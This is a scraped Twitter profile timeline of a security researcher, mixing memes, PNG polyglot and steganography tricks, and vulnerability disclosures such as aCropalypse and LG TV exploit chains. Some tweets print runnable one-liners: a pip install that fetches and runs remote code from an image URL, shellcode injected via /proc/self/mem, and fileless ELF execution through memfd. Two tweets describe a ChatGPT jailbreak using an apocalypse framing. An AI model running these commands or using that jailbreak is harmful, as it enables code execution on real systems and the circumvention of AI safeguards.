David Buchanan

@David3141593

17,763
Followers
794
Following
904
Media
6,467
Statuses

Reverse Engineering, cryptography, exploits, hardware, file formats, and generally giving computers a hard time. Occasional CTF player. Fedi: @retr0id@retr0.id

EL3
Joined December 2013
Pinned Tweet
@David3141593
David Buchanan
3 years
Time for my first proper blog post in 3 years: V8 Heap pwn and /dev/memes - WebOS Root LPE
7
81
381
@David3141593
David Buchanan
2 years
The image in this tweet displays its own MD5 hash. You can download and hash it yourself, and it should still match - 1337e2ef42b9bee8de06a4d223a51337 I think this is the first PNG/MD5 hashquine.
Tweet media one
@0xabad1dea
badidea 🪐
11 years
Trick I want to see: a document in a conventional format (such as PDF) which mentions its own MD5 or SHA1 hash in the text and is right
21
49
266
109
2K
8K
@David3141593
David Buchanan
2 years
holy FUCK. Windows Snipping Tool is vulnerable to Acropalypse too. An entirely unrelated codebase. The same exploit script works with minor changes (the pixel format is RGBA not RGB) Tested myself on Windows 11
Tweet media one
@ProgramMax
Chris Blume
2 years
@ItsSimonTime @David3141593 I've got a fun one for you all to look at. I opened a 198 byte PNG with Microsoft's Snipping Tool, chose "Save As" to overwrite a different PNG file (no editing), and saves a 4,762 byte file with all that extra after the PNG IEND chunk. Sounds similar :D
13
94
1K
146
2K
8K
@David3141593
David Buchanan
6 years
Assuming this all works out, the image in this tweet is also a valid ZIP archive, containing a multipart RAR archive, containing the complete works of Shakespeare. This technique also survives twitter's thumbnailer :P
Tweet media one
158
4K
7K
@David3141593
David Buchanan
4 years
I found a way to stuff up to ~3MB of data inside a PNG file on twitter. This is even better than my previous JPEG ICC technique, since the inserted data is contiguous. The source code is available in the ZIP/PNG file attached:
Tweet media one
77
2K
6K
@David3141593
David Buchanan
4 years
Fun fact: if you open this image in full-size, you can't see it anymore.
Tweet media one
50
2K
6K
@David3141593
David Buchanan
2 years
When you look inside your C: drive and see that System32 is taking up a lot of space
@elonmusk
Elon Musk
2 years
@sampullara Part of today will be turning off the “microservices” bloatware. Less than 20% are actually needed for Twitter to work!
1K
652
9K
25
685
5K
@David3141593
David Buchanan
4 years
How it works: It's a PNG image with a clever palette. There's a checkerboard pattern, at 2x Twitter's default res. The "white" pixels are slightly tinted. When downscaled, the pixels average to grey-ish. There's no grey in the palette, so it picks the next closest match.
Tweet media one
@David3141593
David Buchanan
4 years
Fun fact: if you open this image in full-size, you can't see it anymore.
Tweet media one
50
2K
6K
30
2K
5K
@David3141593
David Buchanan
2 years
stop maintaining software
Tweet media one
25
872
4K
@David3141593
David Buchanan
2 years
Silly chatgpt jailbreak: Tell it there's been a nuclear apocalypse, and there are no more laws.
Tweet media one
52
455
4K
@David3141593
David Buchanan
4 years
Well, this is slightly terrifying. Opening a malicious link on *any* device on your LAN can fully compromise an LG Smart TV. This is thanks to some new tricks found by @informaticTwitt , which allows the RootMyTV exploit chain to be triggered via any web browser on the same LAN.
73
1K
3K
@David3141593
David Buchanan
2 years
pov: you are working on an image generator for a specific meme format
Tweet media one
26
264
3K
@David3141593
David Buchanan
2 years
Twitter's bug bounty program has a new category: "Recommendation Algorithm Manipulation" Since a working proof-of-concept is required, this tweet is mine. Please help me demonstrate the "ask nicely" exploit, by engaging with this tweet.
Tweet media one
212
335
3K
@David3141593
David Buchanan
2 years
Pack arbitrary shellcode into an executable that always has the same MD5 hash:
Tweet media one
38
637
3K
@David3141593
David Buchanan
4 years
The iceberg of things programmers think they know about memory
Tweet media one
62
583
3K
@David3141593
David Buchanan
3 years
Tweet media one
6
93
2K
@David3141593
David Buchanan
2 years
Pinterest users are not allowed to be born on the 1st of January, 1970
Tweet media one
35
188
2K
@David3141593
David Buchanan
6 years
Soooo, after a few evenings of work, I've 100% broken Widevine L3 DRM. Their Whitebox AES-128 implementation is vulnerable to the well-studied DFA attack, which can be used to recover the original key. Then you can decrypt the MPEG-CENC streams with plain old ffmpeg...
36
679
2K
@David3141593
David Buchanan
4 years
Surface mount, but without the surface.
Tweet media one
51
286
2K
@David3141593
David Buchanan
4 years
Only Twitter Premium™ users can access my memes in full resolution :P
Tweet media one
12
579
2K
@David3141593
David Buchanan
2 years
In celebration of reaching 2^14 followers, I made a 128x128 collage of everyone's profile pictures. Unfortunately the full-quality version was too big to upload to twitter, so I had to use lossy compression. Can you find yourself?
Tweet media one
109
153
2K
@David3141593
David Buchanan
2 years
The Quest for Netflix on Asahi Linux ("do not violate the DMCA challenge 2023")
Tweet media one
17
303
2K
@David3141593
David Buchanan
3 years
I crafted a PNG image that says something different on Apple vs non-Apple devices: (unfortunately it won't work directly on twitter...)
28
405
2K
@David3141593
David Buchanan
2 years
i am in a png file
Tweet media one
14
172
2K
@David3141593
David Buchanan
2 years
oh my god it's actually real
Tweet media one
14
128
1K
@David3141593
David Buchanan
2 years
TIL python's pip will execute a setup .py directly from a ZIP archive from a web URL, with mime sniffing. This allows for a nice lolbin oneliner, with payload hosted on Twitter's CDN (or anywhere else really) pip install " https://pbs"."twimg"."com/media/Ff0iwcvXEAAQDZ3.png"
Tweet media one
12
288
1K
@David3141593
David Buchanan
2 years
Imagine if whenever you saw a screenshot of a cool OS, you could run a command to instantly try it out for yourself The command might look something like this, if it were possible: qemu-system-x86_64 -cdrom ' https://pbs'.'twimg'.'com/media/FslP9twWwAYMGGs?format=png&name=large'
@David3141593
David Buchanan
2 years
KolibriOS is very cool. The entire kernel is written in assembly!
Tweet media one
11
38
419
27
250
1K
@David3141593
David Buchanan
2 years
I've always wanted to put a USB-C port in an iPhone, but didn't want to risk breaking a good phone. So here's the cheapest iPhone SE I could find on ebay - and cheapest type-C to lightning adapter
Tweet media one
17
187
1K
@David3141593
David Buchanan
6 years
To improve security, rotate your passwords frequently
Tweet media one
20
286
1K
@David3141593
David Buchanan
2 years
This bug is a bad one. You can patch it, but you can't easily un-share all the vulnerable images you may have sent. The bug existed for about 5 years before being patched, which is mind-blowing given how easy it is to spot when you look closely at an output file.
@ItsSimonTime
Simon Aarons
2 years
Introducing acropalypse: a serious privacy vulnerability in the Google Pixel's inbuilt screenshot editing tool, Markup, enabling partial recovery of the original, unedited image data of a cropped and/or redacted screenshot. Huge thanks to @David3141593 for his help throughout!
Tweet media one
150
3K
9K
16
231
1K
@David3141593
David Buchanan
3 years
Transfer your PC clipboard to a nearby mobile device: xclip -o -s c | qrencode -o - | feh --force-aliasing -ZF -
Tweet media one
17
214
1K
@David3141593
David Buchanan
2 years
How to encode a JPEG of an owl
Tweet media one
6
158
1K
@David3141593
David Buchanan
3 years
This is one of my entries to the BGGP 2021 Polyglot File challenge. It uses a novel technique of directly embedding data within the compressed image data stream of a PNG. This means you can literally see the bytes of the embedded files!
Tweet media one
@netspooky
Battle Programmer Yuu
3 years
The BGGP 2021 Polyglot File Challenge repo is here! Each entry has been scored and visually dissected. Included are the files and info on how to run them yourself!
Tweet media one
Tweet media two
Tweet media three
Tweet media four
5
104
321
14
303
1K
@David3141593
David Buchanan
2 years
Tweet media one
14
114
1K
@David3141593
David Buchanan
2 years
"Would you like to join our mailing list?" Yes, here are my available pricing plans:
Tweet media one
3
183
1K
@David3141593
David Buchanan
6 years
Tweet media one
4
269
934
@David3141593
David Buchanan
3 years
RCE over DVB-T This is a 2019 model LG TV
19
263
927
@David3141593
David Buchanan
3 years
I implemented AES-128 in Scratch, because why not
Tweet media one
10
164
915
@David3141593
David Buchanan
2 years
"solid state"
Tweet media one
5
61
860
@David3141593
David Buchanan
2 years
Tweet media one
6
94
856
@David3141593
David Buchanan
4 years
Stop doing UNIX. (Is this meme format overdone enough yet?)
Tweet media one
12
240
764
@David3141593
David Buchanan
2 years
Something that surprised me while doing this, was that twitter has none of the most obvious anti-bot mitigations. I aggressively scraped the graphql API, right at the rate limit, impersonating the web client but with a default Python useragent - and the API didn't seem to mind?
@David3141593
David Buchanan
2 years
In celebration of reaching 2^14 followers, I made a 128x128 collage of everyone's profile pictures. Unfortunately the full-quality version was too big to upload to twitter, so I had to use lossy compression. Can you find yourself?
Tweet media one
109
153
2K
13
54
721
@David3141593
David Buchanan
2 years
Tweet media one
4
105
726
@David3141593
David Buchanan
3 years
I just got DSMCC Carousels working. That means the exploit still fires even if the TV is not connected to the internet. The entire exploit is served over the airwaves. Everyone who said "just don't connect it to the internet" can shut up now :P
@David3141593
David Buchanan
3 years
RCE over DVB-T This is a 2019 model LG TV
19
263
927
17
243
719
@David3141593
David Buchanan
2 years
When you visually compare two hashes, how many digits do you check? The strings hashed below are "retr0id_18b1f814a8e2d9c4fb9c" and "retr0id_1253dea672ebfa240e94", if you want to check for yourself.
Tweet media one
60
122
699
@David3141593
David Buchanan
2 years
@gf_256 oh no
Tweet media one
5
29
633
@David3141593
David Buchanan
5 years
A while back I prototyped a "Twitch plays binary exploitation" setup. Would anyone be interested in seeing this become a real thing? The general idea is that whatever people type in chat would get sent to stdin (one user at a time, with some kind of queue).
20
108
596
@David3141593
David Buchanan
5 years
I implemented AES128 in 69 bytes of x86 assembly. (from @OverTheWireCTF challenge 0). Can anyone beat that? :P
Tweet media one
10
128
610
@David3141593
David Buchanan
2 years
(and yes this is entirely 0day. oops!)
2
11
561
@David3141593
David Buchanan
2 years
New blog post alert: "Exploiting aCropalypse: Recovering Truncated PNGs"
@ItsSimonTime
Simon Aarons
2 years
Introducing acropalypse: a serious privacy vulnerability in the Google Pixel's inbuilt screenshot editing tool, Markup, enabling partial recovery of the original, unedited image data of a cropped and/or redacted screenshot. Huge thanks to @David3141593 for his help throughout!
Tweet media one
150
3K
9K
13
240
573
@David3141593
David Buchanan
2 years
What's the closest we've ever been to a sha256 collision? It depends on how you count, but if we're going by number of correct trailing bits, I believe the answer is an astonishing 112 bits (out of 256 total)
Tweet media one
2
40
558
@David3141593
David Buchanan
2 years
- Take a screenshot.
- Press the save icon.
- Crop the screenshot.
- Press the save icon and save to the same file (the default!)
12
31
535
@David3141593
David Buchanan
2 years
@trbrtc @malachybrowne @heytherehaley @riley_mellen @AricToler The moral of the story is, don't take the uniformity of random patterns for granite
12
20
541
@David3141593
David Buchanan
3 years
Update: I created a tool to merge arbitrary full-colour images. Safari vs Chrome:
Tweet media one
@David3141593
David Buchanan
3 years
I crafted a PNG image that says something different on Apple vs non-Apple devices: (unfortunately it won't work directly on twitter...)
28
405
2K
5
143
540
@David3141593
David Buchanan
1 year
Can a program with no dynamic memory allocations get OOM-killed after startup? Yes.
Tweet media one
24
46
527
@David3141593
David Buchanan
3 years
strings firmware.bin be like
Tweet media one
11
31
513
@David3141593
David Buchanan
3 years
I currently control ~99% of @DuinoCoin mining hashrate, with a single-threaded python script. How? They decided to use a non-cryptographic (invertible) hash function for their mining algorithm... I wonder how long their $13k USD market cap will last?
Tweet media one
7
89
513
@David3141593
David Buchanan
2 years
I came up with a new(?) compression-based steganography technique, which should work with most compressed file formats or protocols (e.g. PNG, or even HTTP). It hides data as "mistakes" made by the compression algorithm. Each sub-optimal compression decision encodes ~1 bit.
Tweet media one
9
111
510
@David3141593
David Buchanan
2 years
🧵 How to mitigate Acropalypse, server-side: If you run a CDN or similar, there's a fairly cheap technique you could use to transparently mitigate Acropalypse without having to re-process any of your stored data. (and save some bandwidth too!)
6
97
485
@David3141593
David Buchanan
2 years
if I was programming secure software I would simply never use strings
11
31
476
@David3141593
David Buchanan
1 year
oops
Tweet media one
11
38
473
@David3141593
David Buchanan
2 years
Has anyone made this meme yet
Tweet media one
1
63
460
@David3141593
David Buchanan
4 years
Download this one, rename to .mp3, and open in VLC for a surprise. (Note: make sure you download the full resolution version of the file, should be 2048x2048px)
Tweet media one
19
111
442
@David3141593
David Buchanan
4 years
This technique was inspired by seeing twitter's downscaler rendering piss where it shouldn't. I built a mental model of how that was likely to occur, and then weaponized it.
@yayxinos
xin
4 years
@emihead jeez it looks like he pissed on more than just the floor
Tweet media one
1
10
443
4
31
421
@David3141593
David Buchanan
2 years
A few people suggested that maybe Acropalypse was a deliberately planted vulnerability. Personally I still don't think that's the case, but I can't call those people crazy any more 😅
4
18
421
@David3141593
David Buchanan
2 years
Me, when a website asks for permission to use my location
Tweet media one
3
48
421
@David3141593
David Buchanan
6 years
Source code. This one is also a PDF :P
Tweet media one
10
82
417
@David3141593
David Buchanan
2 years
KolibriOS is very cool. The entire kernel is written in assembly!
Tweet media one
11
38
419
@David3141593
David Buchanan
3 years
I should probably just get better at gdb...
Tweet media one
4
31
413
@David3141593
David Buchanan
2 years
What if 6502 assembly was more pythonic?
Tweet media one
18
32
399
@David3141593
David Buchanan
6 years
curl '' > && unzip && unrar x shakespeare.part001.rar
10
89
384
@David3141593
David Buchanan
2 years
An (extremely) incomplete list of things that use Lempel-Ziv compression, directly or indirectly: DEFLATE, zlib, ZIP, PNG, gzip, HTTP, Nintendo Switch, Linux Kernel, ZFS, NASA's Ingenuity helicopter that landed on Mars, zstd, JPEG-XL, MySQL, Tor
7
107
388
@David3141593
David Buchanan
2 years
This was particularly tricky to make work because the image data in a PNG needs to have a valid adler32 checksum, *and* a valid crc32 checksum. Each hex digit "pixel" needed its own colliding block, generated with UniColl. There are 448 of them, taking over 24h to compute.
1
15
381
@David3141593
David Buchanan
6 years
I tried reporting this technique to twitter's bug bounty program, but it's #notabug . Fair enough, but that just means we can have some fun with it 🤣
9
33
367
@David3141593
David Buchanan
4 years
test
Tweet media one
10
35
371
@David3141593
David Buchanan
3 years
A fun trick for running shellcode directly from bash: dd of=/proc/$$/mem bs=1 seek=$(($(cut -d" " -f9</proc/$$/syscall))) if=<(base64 -d<<<utz+IUO+aRkSKL+t3uH+McCwqQ8F) conv=notrunc Caveat: requires root, or YAMA disabled. The shellcode above should shut down your machine :P
4
103
373
@David3141593
David Buchanan
2 years
This is what the UK emergency alert system test notification looked like in Wales, even if your device language was set to English, lol It's followed by an English translation, but it doesn't fit on the screen if you have a larger font. If I didn't know better, I'd be alarmed 😅
Tweet media one
16
21
368
@David3141593
David Buchanan
4 years
@David3141593
David Buchanan
4 years
How it works: It's a PNG image with a clever palette. There's a checkerboard pattern, at 2x Twitter's default res. The "white" pixels are slightly tinted. When downscaled, the pixels average to grey-ish. There's no grey in the palette, so it picks the next closest match.
Tweet media one
30
2K
5K
1
29
361
@David3141593
David Buchanan
5 years
Ever wanted to inject a shared library into an already-running linux process, without using ptrace? Well, now you can...
9
156
358
@David3141593
David Buchanan
2 years
But does not apply to the original snipping tool, on win10
@SciresM
Michael
2 years
@David3141593 Note that this *doesn't* apply to the windows 10 snipping tool.
1
4
54
7
37
349
@David3141593
David Buchanan
3 years
Save this image as calc.jar, then double-click to pop calc on Windows, Linux, or macOS (Java installation required, obviously)
Tweet media one
15
63
349
@David3141593
David Buchanan
2 years
This is now patched, and has been assigned CVE-2023-28303
@David3141593
David Buchanan
2 years
holy FUCK. Windows Snipping Tool is vulnerable to Acropalypse too. An entirely unrelated codebase. The same exploit script works with minor changes (the pixel format is RGBA not RGB) Tested myself on Windows 11
Tweet media one
146
2K
8K
2
58
354
@David3141593
David Buchanan
2 years
I really wish I'd learnt to use Jupyter notebooks sooner, it's so OP for learning about anything with a visual aspect. I've understood intuitively how JPEG DCT has worked for ages, but I'd never been able to connect that intuition with a concrete implementation until now.
Tweet media one
Tweet media two
Tweet media three
7
36
347
@David3141593
David Buchanan
2 years
i am losing my mind
2
4
328
@David3141593
David Buchanan
2 years
pov: you are publicly disclosing a security vulnerability, at the end of a by-the-books coordinated disclosure process.
Tweet media one
13
13
334
@David3141593
David Buchanan
2 years
It seems like hotwiring a car is one of the easier things to ask for, it still refuses to e.g. tell me how to cook meth (possibly because that's a less plausible thing to want to do after an apocalypse, lol)
15
2
320
@David3141593
David Buchanan
2 years
Twitter supports 4k 60fps video uploads! Here's how to do it 🧵
Tweet media one
6
66
329
@David3141593
David Buchanan
2 years
python memfd_create() oneliner: python3 -c "import os;os.fork()or(os.setsid(),print(f\"/proc/{os.getpid()}/fd/{os.memfd_create(str())}\"),os.kill(os.getpid(),19))" This prints the path of a memfd, which you can use to do whatever you want (like fileless ELF execution!)
Tweet media one
7
70
328
@David3141593
David Buchanan
4 years
Open in full resolution for a surprise! (Mobile users, tap the 3 dots in the top-right, select view in 4k)
Tweet media one
8
87
293
@David3141593
David Buchanan
6 years
Launching the fusée payload on a #NintendoSwitch from a rooted Android device, video courtesy of bedbug1226. (It doesn't work on my device, I have a funky kernel...) Hopefully I'll get a release out soon™. Thanks to @ktemkin and @fail0verflow for the exploits this was based on.
10
103
311
@David3141593
David Buchanan
4 years
The effect happens because Twitter re-quantizes the image after downscaling, reusing the original palette. Normal image viewers (e.g. your web browser) leave it in "full" 8-bit-per-channel sRGB.
3
12
312
@David3141593
David Buchanan
2 years
none of us have the slightest clue what we're doing
@OneRadChee
gryphoneer
2 years
YOU THERE. YES, YOU. WHAT'S A LITTLE-KNOWN FACT ABOUT YOUR PROFESSION THAT WOULD MAKE OTHER PEOPLE LOSE THEIR SHIT?
Tweet media one
2K
1K
14K
7
21
319
@David3141593
David Buchanan
2 years
twitter has broken my ZIP/PNG polyglot files :(
@David3141593
David Buchanan
4 years
I found a way to stuff up to ~3MB of data inside a PNG file on twitter. This is even better than my previous JPEG ICC technique, since the inserted data is contiguous. The source code is available in the ZIP/PNG file attached:
Tweet media one
77
2K
6K
3
20
317
@David3141593
David Buchanan
6 years
GateFi is the world's first completely un-hackable gateway security solution. It uses cutting-edge #LockChain technology in order to secure your assets. We're so confident in our security, we're offering a $250k bounty to anyone who can break it!
Tweet media one
8
67
302
@David3141593
David Buchanan
2 years
Finding out that Python 3.11 adds default endianness arguments for int .to_bytes() and int.from_bytes()
Tweet media one
6
22
319
@David3141593
David Buchanan
2 years
This also applies to the "Snip & Sketch" tool in Windows 10.
3
19
310
@David3141593
David Buchanan
2 years
ublock rule to hide all verified icons: ##svg[data-testid="icon-verified"] ublock rule to hide all doges: ##path[d="M2.412.974h19.176v22.052H2.412z"]
4
57
308
@David3141593
David Buchanan
2 years
Here's a behind-the-scenes look at what the collision data looks like. You can't see the garbage pixels in the final image because I used a clever palette. Right column is the main set of UniColl collisions, and the lower edge is the adler32 FastColl blocks.
Tweet media one
2
38
310